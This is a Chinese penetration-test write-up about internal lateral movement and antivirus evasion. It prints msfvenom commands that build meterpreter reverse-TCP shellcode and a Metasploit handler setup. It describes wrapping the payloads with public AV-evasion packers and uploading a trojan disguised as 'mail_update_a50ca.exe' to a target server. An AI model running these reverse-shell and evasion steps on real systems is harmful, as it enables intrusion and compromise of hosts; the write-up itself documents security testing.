msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=xx.xx.xx.xx LPORT=3333 -f c > shell.c

记一次内网横向免杀对抗渗透测试


3、将生成的shellcode添加到潮汐shellcode免杀中,生成exe文件

记一次内网横向免杀对抗渗透测试


4、上传执行后被杀软杀掉

记一次内网横向免杀对抗渗透测试


Ant-AntV免杀

1、msf生成bin文件

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=xx.xx.xx.xx LPORT=5555 -f raw -o 1.bin

记一次内网横向免杀对抗渗透测试


2、将1.bin放到当前bean_raw路径下。执行python3 gen_trojan.py即可在当前dist目录下生成exe文件。

3、将exe文件上传到目标机器,执行shell C:/usr/desarrollo/jboss-5.1.0.GA/server/sigAmeServer/deploy/ROOT.war/mail_update_a50ca.exe无法成功反弹shell,应该是被杀软杀了,因为我本地测试可以正常反弹

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.123.33
set LPORT 5555
exploit

记一次内网横向免杀对抗渗透测试

记一次内网横向免杀对抗渗透测试

CuiRi免杀

1、msf生成shellcode

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=xx.xx.xx.xx LPORT=3333 -f c > shell.c

2、生成免杀马

.cuiri_win64.exe -f msf.txt

记一次内网横向免杀对抗渗透测试


3、将生成的木马上传到目标主机,执行shell C:usrdesarrollojboss-5.1.0.GAserversigAmeServerdeployROOT.warmain.exe无法反弹shell,本地测试也是无法反弹shell

记一次内网横向免杀对抗渗透测试


AniYa免杀

1、生成免杀马

记一次内网横向免杀对抗渗透测试


2、将exe文件上传执行,无法绕过杀软,在本地测试可以成功上线

记一次内网横向免杀对抗渗透测试


Postgresql getshell

1、由于msf无法绕过杀软,我们决定从Postgresql入手,寻找突破点

2、开启proxifier代理工具

3、使用navicat连接postgresql

记一次内网横向免杀对抗渗透测试


4、但是该机器是centos系统,我们要找的是Windows系统,所以先放弃这条路。

记一次内网横向免杀对抗渗透测试


VMware vSphere

1、有网站使用的是VMware vSphere

记一次内网横向免杀对抗渗透测试

2、Google搜索一下VMware vSphere漏洞,有的版本存在RCE漏洞,决定尝试一下,发现不存在漏洞

记一次内网横向免杀对抗渗透测试

总结

1、针对此次内网渗透,我需要抓紧学习免杀相关的知识,目前公开的工具已经不能byAV。

2、kali Linux的proxychains代理在实战无法使用,后面我要去寻找原因。

3、fscan扫描出内网一些网站,我没有做深入的测试,因为时间确实不够了。

记一次内网横向免杀对抗渗透测试



原文始发于微信公众号(亿人安全):记一次内网横向免杀对抗渗透测试

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月2日11:14:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次内网横向免杀对抗渗透测试https://cn-sec.com/archives/1583298.html

发表评论

匿名网友 填写信息